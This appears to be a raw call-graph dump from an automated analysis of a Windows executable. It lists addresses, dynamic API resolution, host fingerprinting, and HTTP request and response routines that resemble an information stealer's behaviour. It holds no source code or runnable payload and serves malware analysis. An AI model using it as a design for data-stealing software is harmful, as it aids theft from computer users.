2 API calls 14150->14151 14152 402fc9 14151->14152 14153 4045c0 2 API calls 14152->14153 14154 402fe2 14153->14154 14155 4045c0 2 API calls 14154->14155 14156 402ffb 14155->14156 14157 4045c0 2 API calls 14156->14157 14158 403014 14157->14158 14159 4045c0 2 API calls 14158->14159 14160 40302d 14159->14160 14161 4045c0 2 API calls 14160->14161 14162 403046 14161->14162 14163 4045c0 2 API calls 14162->14163 14164 40305f 14163->14164 14165 4045c0 2 API calls 14164->14165 14166 403078 14165->14166 14167 4045c0 2 API calls 14166->14167 14168 403091 14167->14168 14169 4045c0 2 API calls 14168->14169 14170 4030aa 14169->14170 14171 4045c0 2 API calls 14170->14171 14172 4030c3 14171->14172 14173 4045c0 2 API calls 14172->14173 14174 4030dc 14173->14174 14175 4045c0 2 API calls 14174->14175 14176 4030f5 14175->14176 14177 4045c0 2 API calls 14176->14177 14178 40310e 14177->14178 14179 4045c0 2 API calls 14178->14179 14180 403127 14179->14180 14181 4045c0 2 API calls 14180->14181 14182 403140 14181->14182 14183 4045c0 2 API calls 14182->14183 14184 403159 14183->14184 14185 4045c0 2 API calls 14184->14185 14186 403172 14185->14186 14187 4045c0 2 API calls 14186->14187 14188 40318b 14187->14188 14189 4045c0 2 API calls 14188->14189 14190 4031a4 14189->14190 14191 4045c0 2 API calls 14190->14191 14192 4031bd 14191->14192 14193 4045c0 2 API calls 14192->14193 14194 4031d6 14193->14194 14195 4045c0 2 API calls 14194->14195 14196 4031ef 14195->14196 14197 4045c0 2 API calls 14196->14197 14198 403208 14197->14198 14199 4045c0 2 API calls 14198->14199 14200 403221 14199->14200 14201 4045c0 2 API calls 14200->14201 14202 40323a 14201->14202 14203 4045c0 2 API calls 14202->14203 14204 403253 14203->14204 14205 4045c0 2 API calls 14204->14205 14206 40326c 14205->14206 14207 4045c0 2 API calls 14206->14207 14208 403285 14207->14208 14209 4045c0 2 API calls 14208->14209 14210 40329e 14209->14210 14211 4045c0 2 API calls 14210->14211 14212 4032b7 14211->14212 14213 4045c0 2 API calls 14212->14213 14214 4032d0 14213->14214 14215 4045c0 2 API calls 14214->14215 14216 4032e9 14215->14216 14217 4045c0 2 API calls 14216->14217 14218 403302 14217->14218 14219 4045c0 2 API calls 14218->14219 14220 40331b 14219->14220 14221 4045c0 2 API calls 14220->14221 14222 403334 14221->14222 14223 4045c0 2 API calls 14222->14223 14224 40334d 14223->14224 14225 4045c0 2 API calls 14224->14225 14226 403366 14225->14226 14227 4045c0 2 API calls 14226->14227 14228 40337f 14227->14228 14229 4045c0 2 API calls 14228->14229 14230 403398 14229->14230 14231 4045c0 2 API calls 14230->14231 14232 4033b1 14231->14232 14233 4045c0 2 API calls 14232->14233 14234 4033ca 14233->14234 14235 4045c0 2 API calls 14234->14235 14236 4033e3 14235->14236 14237 4045c0 2 API calls 14236->14237 14238 4033fc 14237->14238 14239 4045c0 2 API calls 14238->14239 14240 403415 14239->14240 14241 4045c0 2 API calls 14240->14241 14242 40342e 14241->14242 14243 4045c0 2 API calls 14242->14243 14244 403447 14243->14244 14245 4045c0 2 API calls 14244->14245 14246 403460 14245->14246 14247 4045c0 2 API calls 14246->14247 14248 403479 14247->14248 14249 4045c0 2 API calls 14248->14249 14250 403492 14249->14250 14251 4045c0 2 API calls 14250->14251 14252 4034ab 14251->14252 14253 4045c0 2 API calls 14252->14253 14254 4034c4 14253->14254 14255 4045c0 2 API calls 14254->14255 14256 4034dd 14255->14256 14257 4045c0 2 API calls 14256->14257 14258 4034f6 14257->14258 14259 4045c0 2 API calls 14258->14259 14260 40350f 14259->14260 14261 4045c0 2 API calls 14260->14261 14262 403528 14261->14262 14263 4045c0 2 API calls 14262->14263 14264 403541 14263->14264 14265 4045c0 2 API calls 14264->14265 14266 40355a 14265->14266 14267 4045c0 2 API calls 14266->14267 14268 403573 14267->14268 14269 4045c0 2 API calls 14268->14269 14270 40358c 14269->14270 14271 4045c0 2 API calls 14270->14271 14272 4035a5 14271->14272 14273 4045c0 2 API calls 14272->14273 14274 4035be 14273->14274 14275 4045c0 2 API calls 14274->14275 14276 4035d7 14275->14276 14277 4045c0 2 API calls 14276->14277 14278 4035f0 14277->14278 14279 4045c0 2 API calls 14278->14279 14280 403609 14279->14280 14281 4045c0 2 API calls 14280->14281 14282 403622 14281->14282 14283 4045c0 2 API calls 14282->14283 14284 40363b 14283->14284 14285 4045c0 2 API calls 14284->14285 14286 403654 14285->14286 14287 4045c0 2 API calls 14286->14287 14288 40366d 14287->14288 14289 4045c0 2 API calls 14288->14289 14290 403686 14289->14290 14291 4045c0 2 API calls 14290->14291 14292 40369f 14291->14292 14293 4045c0 2 API calls 14292->14293 14294 4036b8 14293->14294 14295 4045c0 2 API calls 14294->14295 14296 4036d1 14295->14296 14297 4045c0 2 API calls 14296->14297 14298 4036ea 14297->14298 14299 4045c0 2 API calls 14298->14299 14300 403703 14299->14300 14301 4045c0 2 API calls 14300->14301 14302 40371c 14301->14302 14303 4045c0 2 API calls 14302->14303 14304 403735 14303->14304 14305 4045c0 2 API calls 14304->14305 14306 40374e 14305->14306 14307 4045c0 2 API calls 14306->14307 14308 403767 14307->14308 14309 4045c0 2 API calls 14308->14309 14310 403780 14309->14310 14311 4045c0 2 API calls 14310->14311 14312 403799 14311->14312 14313 4045c0 2 API calls 14312->14313 14314 4037b2 14313->14314 14315 4045c0 2 API calls 14314->14315 14316 4037cb 14315->14316 14317 4045c0 2 API calls 14316->14317 14318 4037e4 14317->14318 14319 4045c0 2 API calls 14318->14319 14320 4037fd 14319->14320 14321 4045c0 2 API calls 14320->14321 14322 403816 14321->14322 14323 4045c0 2 API calls 14322->14323 14324 40382f 14323->14324 14325 4045c0 2 API calls 14324->14325 14326 403848 14325->14326 14327 4045c0 2 API calls 14326->14327 14328 403861 14327->14328 14329 4045c0 2 API calls 14328->14329 14330 40387a 14329->14330 14331 4045c0 2 API calls 14330->14331 14332 403893 14331->14332 14333 4045c0 2 API calls 14332->14333 14334 4038ac 14333->14334 14335 4045c0 2 API calls 14334->14335 14336 4038c5 14335->14336 14337 4045c0 2 API calls 14336->14337 14338 4038de 14337->14338 14339 4045c0 2 API calls 14338->14339 14340 4038f7 14339->14340 14341 4045c0 2 API calls 14340->14341 14342 403910 14341->14342 14343 4045c0 2 API calls 14342->14343 14344 403929 14343->14344 14345 4045c0 2 API calls 14344->14345 14346 403942 14345->14346 14347 4045c0 2 API calls 14346->14347 14348 40395b 14347->14348 14349 4045c0 2 API calls 14348->14349 14350 403974 14349->14350 14351 4045c0 2 API calls 14350->14351 14352 40398d 14351->14352 14353 4045c0 2 API calls 14352->14353 14354 4039a6 14353->14354 14355 4045c0 2 API calls 14354->14355 14356 4039bf 14355->14356 14357 4045c0 2 API calls 14356->14357 14358 4039d8 14357->14358 14359 4045c0 2 API calls 14358->14359 14360 4039f1 14359->14360 14361 4045c0 2 API calls 14360->14361 14362 403a0a 14361->14362 14363 4045c0 2 API calls 14362->14363 14364 403a23 14363->14364 14365 4045c0 2 API calls 14364->14365 14366 403a3c 14365->14366 14367 4045c0 2 API calls 14366->14367 14368 403a55 14367->14368 14369 4045c0 2 API calls 14368->14369 14370 403a6e 14369->14370 14371 4045c0 2 API calls 14370->14371 14372 403a87 14371->14372 14373 4045c0 2 API calls 14372->14373 14374 403aa0 14373->14374 14375 4045c0 2 API calls 14374->14375 14376 403ab9 14375->14376 14377 4045c0 2 API calls 14376->14377 14378 403ad2 14377->14378 14379 4045c0 2 API calls 14378->14379 14380 403aeb 14379->14380 14381 4045c0 2 API calls 14380->14381 14382 403b04 14381->14382 14383 4045c0 2 API calls 14382->14383 14384 403b1d 14383->14384 14385 4045c0 2 API calls 14384->14385 14386 403b36 14385->14386 14387 4045c0 2 API calls 14386->14387 14388 403b4f 14387->14388 14389 4045c0 2 API calls 14388->14389 14390 403b68 14389->14390 14391 4045c0 2 API calls 14390->14391 14392 403b81 14391->14392 14393 4045c0 2 API calls 14392->14393 14394 403b9a 14393->14394 14395 4045c0 2 API calls 14394->14395 14396 403bb3 14395->14396 14397 4045c0 2 API calls 14396->14397 14398 403bcc 14397->14398 14399 4045c0 2 API calls 14398->14399 14400 403be5 14399->14400 14401 4045c0 2 API calls 14400->14401 14402 403bfe 14401->14402 14403 4045c0 2 API calls 14402->14403 14404 403c17 14403->14404 14405 4045c0 2 API calls 14404->14405 14406 403c30 14405->14406 14407 4045c0 2 API calls 14406->14407 14408 403c49 14407->14408 14409 4045c0 2 API calls 14408->14409 14410 403c62 14409->14410 14411 4045c0 2 API calls 14410->14411 14412 403c7b 14411->14412 14413 4045c0 2 API calls 14412->14413 14414 403c94 14413->14414 14415 4045c0 2 API calls 14414->14415 14416 403cad 14415->14416 14417 4045c0 2 API calls 14416->14417 14418 403cc6 14417->14418 14419 4045c0 2 API calls 14418->14419 14420 403cdf 14419->14420 14421 4045c0 2 API calls 14420->14421 14422 403cf8 14421->14422 14423 4045c0 2 API calls 14422->14423 14424 403d11 14423->14424 14425 4045c0 2 API calls 14424->14425 14426 403d2a 14425->14426 14427 4045c0 2 API calls 14426->14427 14428 403d43 14427->14428 14429 4045c0 2 API calls 14428->14429 14430 403d5c 14429->14430 14431 4045c0 2 API calls 14430->14431 14432 403d75 14431->14432 14433 4045c0 2 API calls 14432->14433 14434 403d8e 14433->14434 14435 4045c0 2 API calls 14434->14435 14436 403da7 14435->14436 14437 4045c0 2 API calls 14436->14437 14438 403dc0 14437->14438 14439 4045c0 2 API calls 14438->14439 14440 403dd9 14439->14440 14441 4045c0 2 API calls 14440->14441 14442 403df2 14441->14442 14443 4045c0 2 API calls 14442->14443 14444 403e0b 14443->14444 14445 4045c0 2 API calls 14444->14445 14446 403e24 14445->14446 14447 4045c0 2 API calls 14446->14447 14448 403e3d 14447->14448 14449 4045c0 2 API calls 14448->14449 14450 403e56 14449->14450 14451 4045c0 2 API calls 14450->14451 14452 403e6f 14451->14452 14453 4045c0 2 API calls 14452->14453 14454 403e88 14453->14454 14455 4045c0 2 API calls 14454->14455 14456 403ea1 14455->14456 14457 4045c0 2 API calls 14456->14457 14458 403eba 14457->14458 14459 4045c0 2 API calls 14458->14459 14460 403ed3 14459->14460 14461 4045c0 2 API calls 14460->14461 14462 403eec 14461->14462 14463 4045c0 2 API calls 14462->14463 14464 403f05 14463->14464 14465 4045c0 2 API calls 14464->14465 14466 403f1e 14465->14466 14467 4045c0 2 API calls 14466->14467 14468 403f37 14467->14468 14469 4045c0 2 API calls 14468->14469 14470 403f50 14469->14470 14471 4045c0 2 API calls 14470->14471 14472 403f69 14471->14472 14473 4045c0 2 API calls 14472->14473 14474 403f82 14473->14474 14475 4045c0 2 API calls 14474->14475 14476 403f9b 14475->14476 14477 4045c0 2 API calls 14476->14477 14478 403fb4 14477->14478 14479 4045c0 2 API calls 14478->14479 14480 403fcd 14479->14480 14481 4045c0 2 API calls 14480->14481 14482 403fe6 14481->14482 14483 4045c0 2 API calls 14482->14483 14484 403fff 14483->14484 14485 4045c0 2 API calls 14484->14485 14486 404018 14485->14486 14487 4045c0 2 API calls 14486->14487 14488 404031 14487->14488 14489 4045c0 2 API calls 14488->14489 14490 40404a 14489->14490 14491 4045c0 2 API calls 14490->14491 14492 404063 14491->14492 14493 4045c0 2 API calls 14492->14493 14494 40407c 14493->14494 14495 4045c0 2 API calls 14494->14495 14496 404095 14495->14496 14497 4045c0 2 API calls 14496->14497 14498 4040ae 14497->14498 14499 4045c0 2 API calls 14498->14499 14500 4040c7 14499->14500 14501 4045c0 2 API calls 14500->14501 14502 4040e0 14501->14502 14503 4045c0 2 API calls 14502->14503 14504 4040f9 14503->14504 14505 4045c0 2 API calls 14504->14505 14506 404112 14505->14506 14507 4045c0 2 API calls 14506->14507 14508 40412b 14507->14508 14509 4045c0 2 API calls 14508->14509 14510 404144 14509->14510 14511 4045c0 2 API calls 14510->14511 14512 40415d 14511->14512 14513 4045c0 2 API calls 14512->14513 14514 404176 14513->14514 14515 4045c0 2 API calls 14514->14515 14516 40418f 14515->14516 14517 4045c0 2 API calls 14516->14517 14518 4041a8 14517->14518 14519 4045c0 2 API calls 14518->14519 14520 4041c1 14519->14520 14521 4045c0 2 API calls 14520->14521 14522 4041da 14521->14522 14523 4045c0 2 API calls 14522->14523 14524 4041f3 14523->14524 14525 4045c0 2 API calls 14524->14525 14526 40420c 14525->14526 14527 4045c0 2 API calls 14526->14527 14528 404225 14527->14528 14529 4045c0 2 API calls 14528->14529 14530 40423e 14529->14530 14531 4045c0 2 API calls 14530->14531 14532 404257 14531->14532 14533 4045c0 2 API calls 14532->14533 14534 404270 14533->14534 14535 4045c0 2 API calls 14534->14535 14536 404289 14535->14536 14537 4045c0 2 API calls 14536->14537 14538 4042a2 14537->14538 14539 4045c0 2 API calls 14538->14539 14540 4042bb 14539->14540 14541 4045c0 2 API calls 14540->14541 14542 4042d4 14541->14542 14543 4045c0 2 API calls 14542->14543 14544 4042ed 14543->14544 14545 4045c0 2 API calls 14544->14545 14546 404306 14545->14546 14547 4045c0 2 API calls 14546->14547 14548 40431f 14547->14548 14549 4045c0 2 API calls 14548->14549 14550 404338 14549->14550 14551 4045c0 2 API calls 14550->14551 14552 404351 14551->14552 14553 4045c0 2 API calls 14552->14553 14554 40436a 14553->14554 14555 4045c0 2 API calls 14554->14555 14556 404383 14555->14556 14557 4045c0 2 API calls 14556->14557 14558 40439c 14557->14558 14559 4045c0 2 API calls 14558->14559 14560 4043b5 14559->14560 14561 4045c0 2 API calls 14560->14561 14562 4043ce 14561->14562 14563 4045c0 2 API calls 14562->14563 14564 4043e7 14563->14564 14565 4045c0 2 API calls 14564->14565 14566 404400 14565->14566 14567 4045c0 2 API calls 14566->14567 14568 404419 14567->14568 14569 4045c0 2 API calls 14568->14569 14570 404432 14569->14570 14571 4045c0 2 API calls 14570->14571 14572 40444b 14571->14572 14573 4045c0 2 API calls 14572->14573 14574 404464 14573->14574 14575 4045c0 2 API calls 14574->14575 14576 40447d 14575->14576 14577 4045c0 2 API calls 14576->14577 14578 404496 14577->14578 14579 4045c0 2 API calls 14578->14579 14580 4044af 14579->14580 14581 4045c0 2 API calls 14580->14581 14582 4044c8 14581->14582 14583 4045c0 2 API calls 14582->14583 14584 4044e1 14583->14584 14585 4045c0 2 API calls 14584->14585 14586 4044fa 14585->14586 14587 4045c0 2 API calls 14586->14587 14588 404513 14587->14588 14589 4045c0 2 API calls 14588->14589 14590 40452c 14589->14590 14591 4045c0 2 API calls 14590->14591 14592 404545 14591->14592 14593 4045c0 2 API calls 14592->14593 14594 40455e 14593->14594 14595 4045c0 2 API calls 14594->14595 14596 404577 14595->14596 14597 4045c0 2 API calls 14596->14597 14598 404590 14597->14598 14599 4045c0 2 API calls 14598->14599 14600 4045a9 14599->14600 14601 419c10 14600->14601 14602 419c20 43 API calls 14601->14602 14603 41a036 8 API calls 14601->14603 14602->14603 14604 41a146 14603->14604 14605 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14603->14605 14606 41a153 8 API calls 14604->14606 14607 41a216 14604->14607 14605->14604 14606->14607 14608 41a298 14607->14608 14609 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14607->14609 14610 41a2a5 6 API calls 14608->14610 14611 41a337 14608->14611 14609->14608 14610->14611 14612 41a344 9 API calls 14611->14612 14613 41a41f 14611->14613 14612->14613 14614 41a4a2 14613->14614 14615 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14613->14615 14616 41a4ab GetProcAddress GetProcAddress 14614->14616 14617 41a4dc 14614->14617 14615->14614 14616->14617 14618 41a515 14617->14618 14619 41a4e5 GetProcAddress GetProcAddress 14617->14619 14620 41a612 14618->14620 14621 41a522 10 API calls 14618->14621 14619->14618 14622 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14620->14622 14623 41a67d 14620->14623 14621->14620 14622->14623 14624 41a686 GetProcAddress 14623->14624 14625 41a69e 14623->14625 14624->14625 14626 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14625->14626 14627 415ca3 14625->14627 14626->14627 14628 401590 14627->14628 15749 401670 14628->15749 14631 41a7a0 lstrcpy 14632 4015b5 14631->14632 14633 41a7a0 lstrcpy 14632->14633 14634 4015c7 14633->14634 14635 41a7a0 lstrcpy 14634->14635 14636 4015d9 14635->14636 14637 41a7a0 lstrcpy 14636->14637 14638 401663 14637->14638 14639 415510 14638->14639 14640 415521 14639->14640 14641 41a820 2 API calls 14640->14641 14642 41552e 14641->14642 14643 41a820 2 API calls 14642->14643 14644 41553b 14643->14644 14645 41a820 2 API calls 14644->14645 14646 415548 14645->14646 14647 41a740 lstrcpy 14646->14647 14648 415555 14647->14648 14649 41a740 lstrcpy 14648->14649 14650 415562 14649->14650 14651 41a740 lstrcpy 14650->14651 14652 41556f 14651->14652 14653 41a740 lstrcpy 14652->14653 14693 41557c 14653->14693 14654 41a820 lstrlen lstrcpy 14654->14693 14655 415643 StrCmpCA 14655->14693 14656 4156a0 StrCmpCA 14658 4157dc 14656->14658 14656->14693 14657 41a7a0 lstrcpy 14657->14693 14659 41a8a0 lstrcpy 14658->14659 14660 4157e8 14659->14660 14661 41a820 2 API calls 14660->14661 14664 4157f6 14661->14664 14662 41a740 lstrcpy 14662->14693 14663 4151f0 20 API calls 14663->14693 14666 41a820 2 API calls 14664->14666 14665 415856 StrCmpCA 14667 415991 14665->14667 14665->14693 14670 415805 14666->14670 14669 41a8a0 lstrcpy 14667->14669 14668 41a8a0 lstrcpy 14668->14693 14671 41599d 14669->14671 14672 401670 lstrcpy 14670->14672 14673 41a820 2 API calls 14671->14673 14690 415811 14672->14690 14675 4159ab 14673->14675 14674 4152c0 25 API calls 14674->14693 14679 41a820 2 API calls 14675->14679 14676 415a0b StrCmpCA 14677 415a16 Sleep 14676->14677 14678 415a28 14676->14678 14677->14693 14680 41a8a0 lstrcpy 14678->14680 14681 4159ba 14679->14681 14682 415a34 14680->14682 14683 401670 lstrcpy 14681->14683 14684 41a820 2 API calls 14682->14684 14683->14690 14685 415a43 14684->14685 14686 41a820 2 API calls 14685->14686 14687 415a52 14686->14687 14689 401670 lstrcpy 14687->14689 14688 41578a StrCmpCA 14688->14693 14689->14690 14690->13746 14691 401590 lstrcpy 14691->14693 14692 41593f StrCmpCA 14692->14693 14693->14654 14693->14655 14693->14656 14693->14657 14693->14662 14693->14663 14693->14665 14693->14668 14693->14674 14693->14676 14693->14688 14693->14691 14693->14692 14695 417553 GetVolumeInformationA 14694->14695 14696 41754c 14694->14696 14697 417591 14695->14697 14696->14695 14698 4175fc GetProcessHeap RtlAllocateHeap 14697->14698 14699 417619 14698->14699 14700 417628 wsprintfA 14698->14700 14701 41a740 lstrcpy 14699->14701 14702 41a740 lstrcpy 14700->14702 14703 415da7 14701->14703 14702->14703 14703->13767 14705 41a7a0 lstrcpy 14704->14705 14706 404899 14705->14706 15758 4047b0 14706->15758 14708 4048a5 14709 41a740 lstrcpy 14708->14709 14710 4048d7 14709->14710 14711 41a740 lstrcpy 14710->14711 14712 4048e4 14711->14712 14713 41a740 lstrcpy 14712->14713 14714 4048f1 14713->14714 14715 41a740 lstrcpy 14714->14715 14716 4048fe 14715->14716 14717 41a740 lstrcpy 14716->14717 14718 40490b InternetOpenA StrCmpCA 14717->14718 14719 404944 14718->14719 14720 404ecb InternetCloseHandle 14719->14720 15764 418b60 14719->15764 14722 404ee8 14720->14722 15779 409ac0 CryptStringToBinaryA 14722->15779 14723 404963 15772 41a920 14723->15772 14726 404976 14728 41a8a0 lstrcpy 14726->14728 14733 40497f 14728->14733 14729 41a820 2 API calls 14730 404f05 14729->14730 14731 41a9b0 4 API calls 14730->14731 14734 404f1b 14731->14734 14732 404f27 codecvt 14736 41a7a0 lstrcpy 14732->14736 14737 41a9b0 4 API calls 14733->14737 14735 41a8a0 lstrcpy 14734->14735 14735->14732 14749 404f57 14736->14749 14738 4049a9 14737->14738 14739 41a8a0 lstrcpy 14738->14739 14740 4049b2 14739->14740 14741 41a9b0 4 API calls 14740->14741 14742 4049d1 14741->14742 14743 41a8a0 lstrcpy 14742->14743 14744 4049da 14743->14744 14745 41a920 3 API calls 14744->14745 14746 4049f8 14745->14746 14747 41a8a0 lstrcpy 14746->14747 14748 404a01 14747->14748 14750 41a9b0 4 API calls 14748->14750 14749->13770 14751 404a20 14750->14751 14752 41a8a0 lstrcpy 14751->14752 14753 404a29 14752->14753 14754 41a9b0 4 API calls 14753->14754 14755 404a48 14754->14755 14756 41a8a0 lstrcpy 14755->14756 14757 404a51 14756->14757 14758 41a9b0 4 API calls 14757->14758 14759 404a7d 14758->14759 14760 41a920 3 API calls 14759->14760 14761 404a84 14760->14761 14762 41a8a0 lstrcpy 14761->14762 14763 404a8d 14762->14763 14764 404aa3 InternetConnectA 14763->14764 14764->14720 14765 404ad3 HttpOpenRequestA 14764->14765 14767 404b28 14765->14767 14768 404ebe InternetCloseHandle 14765->14768 14769 41a9b0 4 API calls 14767->14769 14768->14720 14770 404b3c 14769->14770 14771 41a8a0 lstrcpy 14770->14771 14772 404b45 14771->14772 14773 41a920 3 API calls 14772->14773 14774 404b63 14773->14774 14775 41a8a0 lstrcpy 14774->14775 14776 404b6c 14775->14776 14777 41a9b0 4 API calls 14776->14777 14778 404b8b 14777->14778 14779 41a8a0 lstrcpy 14778->14779 14780 404b94 14779->14780 14781 41a9b0 4 API calls 14780->14781 14782 404bb5 14781->14782 14783 41a8a0 lstrcpy 14782->14783 14784 404bbe 14783->14784 14785 41a9b0 4 API calls 14784->14785 14786 404bde 14785->14786 14787 41a8a0 lstrcpy 14786->14787 14788 404be7 14787->14788 14789 41a9b0 4 API calls 14788->14789 14790 404c06 14789->14790 14791 41a8a0 lstrcpy 14790->14791 14792 404c0f 14791->14792 14793 41a920 3 API calls 14792->14793 14794 404c2d 14793->14794 14795 41a8a0 lstrcpy 14794->14795 14796 404c36 14795->14796 14797 41a9b0 4 API calls 14796->14797 14798 404c55 14797->14798 14799 41a8a0 lstrcpy 14798->14799 14800 404c5e 14799->14800 14801 41a9b0 4 API calls 14800->14801 14802 404c7d 14801->14802 14803 41a8a0 lstrcpy 14802->14803 14804 404c86 14803->14804 14805 41a920 3 API calls 14804->14805 14806 404ca4 14805->14806 14807 41a8a0 lstrcpy 14806->14807 14808 404cad 14807->14808 14809 41a9b0 4 API calls 14808->14809 14810 404ccc 14809->14810 14811 41a8a0 lstrcpy 14810->14811 14812 404cd5 14811->14812 14813 41a9b0 4 API calls 14812->14813 14814 404cf6 14813->14814 14815 41a8a0 lstrcpy 14814->14815 14816 404cff 14815->14816 14817 41a9b0 4 API calls 14816->14817 14818 404d1f 14817->14818 14819 41a8a0 lstrcpy 14818->14819 14820 404d28 14819->14820 14821 41a9b0 4 API calls 14820->14821 14822 404d47 14821->14822 14823 41a8a0 lstrcpy 14822->14823 14824 404d50 14823->14824 14825 41a920 3 API calls 14824->14825 14826 404d6e 14825->14826 14827 41a8a0 lstrcpy 14826->14827 14828 404d77 14827->14828 14829 41a740 lstrcpy 14828->14829 14830 404d92 14829->14830 14831 41a920 3 API calls 14830->14831 14832 404db3 14831->14832 14833 41a920 3 API calls 14832->14833 14834 404dba 14833->14834 14835 41a8a0 lstrcpy 14834->14835 14836 404dc6 14835->14836 14837 404de7 lstrlen 14836->14837 14838 404dfa 14837->14838 14839 404e03 lstrlen 14838->14839 15778 41aad0 14839->15778 14841 404e13 HttpSendRequestA 14842 404e32 InternetReadFile 14841->14842 14843 404e67 InternetCloseHandle 14842->14843 14844 404e5e 14842->14844 14847 41a800 14843->14847 14844->14842 14844->14843 14846 41a9b0 4 API calls 14844->14846 14848 41a8a0 lstrcpy 14844->14848 14846->14844 14847->14768 14848->14844 15785 41aad0 14849->15785 14851 4117c4 StrCmpCA 14852 4117d7 14851->14852 14853 4117cf ExitProcess 14851->14853 14854 4119c2 14852->14854 14855 4118ad StrCmpCA 14852->14855 14856 4118cf StrCmpCA 14852->14856 14857 4118f1 StrCmpCA 14852->14857 14858 411951 StrCmpCA 14852->14858 14859 411970 StrCmpCA 14852->14859 14860 411913 StrCmpCA 14852->14860 14861 411932 StrCmpCA 14852->14861 14862 41185d StrCmpCA 14852->14862 14863 41187f StrCmpCA 14852->14863 14864 41a820 lstrlen lstrcpy 14852->14864 14854->13772 14855->14852 14856->14852 14857->14852 14858->14852 14859->14852 14860->14852 14861->14852 14862->14852 14863->14852 14864->14852 14866 41a7a0 lstrcpy 14865->14866 14867 405979 14866->14867 14868 4047b0 2 API calls 14867->14868 14869 405985 14868->14869 14870 41a740 lstrcpy 14869->14870 14871 4059ba 14870->14871 14872 41a740 lstrcpy 14871->14872 14873 4059c7 14872->14873 14874 41a740 lstrcpy 14873->14874 14875 4059d4 14874->14875 14876 41a740 lstrcpy 14875->14876 14877 4059e1 14876->14877 14878 41a740 lstrcpy 14877->14878 14879 4059ee InternetOpenA StrCmpCA 14878->14879 14880 405a1d 14879->14880 14881 405fc3 InternetCloseHandle 14880->14881 14882 418b60 3 API calls 14880->14882 14883 405fe0 14881->14883 14884 405a3c 14882->14884 14886 409ac0 4 API calls 14883->14886 14885 41a920 3 API calls 14884->14885 14887 405a4f 14885->14887 14888 405fe6 14886->14888 14889 41a8a0 lstrcpy 14887->14889 14890 41a820 2 API calls 14888->14890 14893 40601f codecvt 14888->14893 14894 405a58 14889->14894 14891 405ffd 14890->14891 14892 41a9b0 4 API calls 14891->14892 14895 406013 14892->14895 14897 41a7a0 lstrcpy 14893->14897 14898 41a9b0 4 API calls 14894->14898 14896 41a8a0 lstrcpy 14895->14896 14896->14893 14906 40604f 14897->14906 14899 405a82 14898->14899 14900 41a8a0 lstrcpy 14899->14900 14901 405a8b 14900->14901 14902 41a9b0 4 API calls 14901->14902 14903 405aaa 14902->14903 14904 41a8a0 lstrcpy 14903->14904 14905 405ab3 14904->14905 14907 41a920 3 API calls 14905->14907 14906->13778 14908 405ad1 14907->14908 14909 41a8a0 lstrcpy 14908->14909 14910 405ada 14909->14910 14911 41a9b0 4 API calls 14910->14911 14912 405af9 14911->14912 14913 41a8a0 lstrcpy 14912->14913 14914 405b02 14913->14914 14915 41a9b0 4 API calls 14914->14915 14916 405b21 14915->14916 14917 41a8a0 lstrcpy 14916->14917 14918 405b2a 14917->14918 14919 41a9b0 4 API calls 14918->14919 14920 405b56 14919->14920 14921 41a920 3 API calls 14920->14921 14922 405b5d 14921->14922 14923 41a8a0 lstrcpy 14922->14923 14924 405b66 14923->14924 14925 405b7c InternetConnectA 14924->14925 14925->14881 14926 405bac HttpOpenRequestA 14925->14926 14928 405fb6 InternetCloseHandle 14926->14928 14929 405c0b 14926->14929 14928->14881 14930 41a9b0 4 API calls 14929->14930 14931 405c1f 14930->14931 14932 41a8a0 lstrcpy 14931->14932 14933 405c28 14932->14933 14934 41a920 3 API calls 14933->14934 14935 405c46 14934->14935 14936 41a8a0 lstrcpy 14935->14936 14937 405c4f 14936->14937 14938 41a9b0 4 API calls 14937->14938 14939 405c6e 14938->14939 14940 41a8a0 lstrcpy 14939->14940 14941 405c77 14940->14941 14942 41a9b0 4 API calls 14941->14942 14943 405c98 14942->14943 14944 41a8a0 lstrcpy 14943->14944 14945 405ca1 14944->14945 14946 41a9b0 4 API calls 14945->14946 14947 405cc1 14946->14947 14948 41a8a0 lstrcpy 14947->14948 14949 405cca 14948->14949 14950 41a9b0 4 API calls 14949->14950 14951 405ce9 14950->14951 14952 41a8a0 lstrcpy 14951->14952 14953 405cf2 14952->14953 14954 41a920 3 API calls 14953->14954 14955 405d10 14954->14955 14956 41a8a0 lstrcpy 14955->14956 14957 405d19 14956->14957 14958 41a9b0 4 API calls 14957->14958 14959 405d38 14958->14959 14960 41a8a0 lstrcpy 14959->14960 14961 405d41 14960->14961 14962 41a9b0 4 API calls 14961->14962 14963 405d60 14962->14963 14964 41a8a0 lstrcpy 14963->14964 14965 405d69 14964->14965 14966 41a920 3 API calls 14965->14966 14967 405d87 14966->14967 14968 41a8a0 lstrcpy 14967->14968 14969 405d90 14968->14969 14970 41a9b0 4 API calls 14969->14970 14971 405daf 14970->14971 14972 41a8a0 lstrcpy 14971->14972 14973 405db8 14972->14973 14974 41a9b0 4 API calls 14973->14974 14975 405dd9 14974->14975 14976 41a8a0 lstrcpy 14975->14976 14977 405de2 14976->14977 14978 41a9b0 4 API calls 14977->14978 14979 405e02 14978->14979 14980 41a8a0 lstrcpy 14979->14980 14981 405e0b 14980->14981 14982 41a9b0 4 API calls 14981->14982 14983 405e2a 14982->14983 14984 41a8a0 lstrcpy 14983->14984 14985 405e33 14984->14985 14986 41a920 3 API calls 14985->14986 14987 405e54 14986->14987 14988 41a8a0 lstrcpy 14987->14988 14989 405e5d 14988->14989 14990 405e70 lstrlen 14989->14990 15786 41aad0 14990->15786 14992 405e81 lstrlen GetProcessHeap RtlAllocateHeap 15787 41aad0 14992->15787 14994 405eae lstrlen 14995 405ebe 14994->14995 14996 405ed7 lstrlen 14995->14996 14997 405ee7 14996->14997 14998 405ef0 lstrlen 14997->14998 14999 405f04 14998->14999 15000 405f1a lstrlen 14999->15000 15788 41aad0 15000->15788 15002 405f2a HttpSendRequestA 15003 405f35 InternetReadFile 15002->15003 15004 405f6a InternetCloseHandle 15003->15004 15008 405f61 15003->15008 15004->14928 15006 41a9b0 4 API calls 15006->15008 15007 41a8a0 lstrcpy 15007->15008 15008->15003 15008->15004 15008->15006 15008->15007 15010 411077 15009->15010 15011 411151 15010->15011 15012 41a820 lstrlen lstrcpy 15010->15012 15011->13780 15012->15010 15014 410db7 15013->15014 15015 410f17 15014->15015 15016 410ea4 StrCmpCA 15014->15016 15017 410e27 StrCmpCA 15014->15017 15018 410e67 